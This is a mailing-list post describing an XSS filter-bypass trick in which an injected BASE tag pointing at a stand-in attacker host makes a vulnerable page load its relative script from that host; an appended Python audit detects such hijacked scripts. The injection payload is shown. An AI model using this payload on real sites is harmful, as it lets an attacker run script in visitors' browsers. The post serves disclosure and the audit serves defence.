
[WEB SECURITY] Nice little XSS trick



Hi list

Recently I've been thinking about bypassing anti-XSS filters, and a nice little trick occurred to me, which I haven't seen anywhere (e.g. it's not on RSnake's XSS cheat sheet - http://ha.ckers.org/xss.html; it does mention BASE, but not the trick I describe here). The idea is to use the HTML BASE tag to force loading of JS code from the attacker's host. Consider a page with an XSS vulnerability such as:

<html>
...
***XSS code may be embedded here***
...
<script src="/foo/bar.js"></script>
...
</html>

Now, an attacker can inject <base href="http://www.attacker.tld/">, and next thing you know, the browser (IE, at least) loads the JS from http://www.attacker.tld/foo/bar.js... And the beauty is that there's no "explicit" JS code involved in the payload itself.

Note that according to the HTML standard, BASE should be placed in the HEAD section (http://www.w3.org/TR/html401/struct/links.html#edef-BASE). This is indeed observed by FF 2, but not by IE (checked IE6).

Thanks,
-Amit
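As an added example (not part of Amit's post), the following Python audit resolves each <script src> the way a lenient browser that honours a body-placed BASE would, and reports two things a defender would want to know about a rendered page: relative script URLs that end up on a different origin than the page itself, and any BASE tag that sits outside HEAD. PAGE_URL, INJECTED_PAGE and the function names are constructed for this illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: the page from the post, with the injected <base>
# landing in the body where the reflected input is echoed.
PAGE_URL = "http://www.victim.example/page"
INJECTED_PAGE = """<html>
<head><title>demo</title></head>
<body>
<p>results for: <base href="http://www.attacker.tld/"></p>
<script src="/foo/bar.js"></script>
<script src="https://cdn.example/lib.js"></script>
</body>
</html>"""
CLEAN_PAGE = INJECTED_PAGE.replace('<base href="http://www.attacker.tld/">', "")


class ScriptResolver(HTMLParser):
    """Track the effective base URL (first <base href> seen anywhere, as IE6
    does per the post) and resolve every <script src> against it."""

    def __init__(self, page_url):
        super().__init__()
        self.base = page_url
        self.in_head = False
        self.base_outside_head = False
        self.scripts = []  # (raw src, resolved URL)

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "head":
            self.in_head = True
        elif tag == "base" and attrs.get("href"):
            self.base = urljoin(self.base, attrs["href"])
            if not self.in_head:
                self.base_outside_head = True
        elif tag == "script" and attrs.get("src"):
            self.scripts.append((attrs["src"], urljoin(self.base, attrs["src"])))

    def handle_endtag(self, tag):
        if tag == "head":
            self.in_head = False


def audit(html, page_url):
    """Return {'base_outside_head': bool, 'hijacked': [resolved URLs]} where
    'hijacked' lists relative script srcs that resolve off the page's origin."""
    p = ScriptResolver(page_url)
    p.feed(html)
    origin = urlsplit(page_url)[:2]  # (scheme, host) of the page itself
    hijacked = [res for raw, res in p.scripts
                if not urlsplit(raw).netloc and urlsplit(res)[:2] != origin]
    return {"base_outside_head": p.base_outside_head, "hijacked": hijacked}
```

Absolute third-party script URLs (the CDN line) are deliberately not flagged; only a relative src whose effective origin was moved by BASE counts as hijacked.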
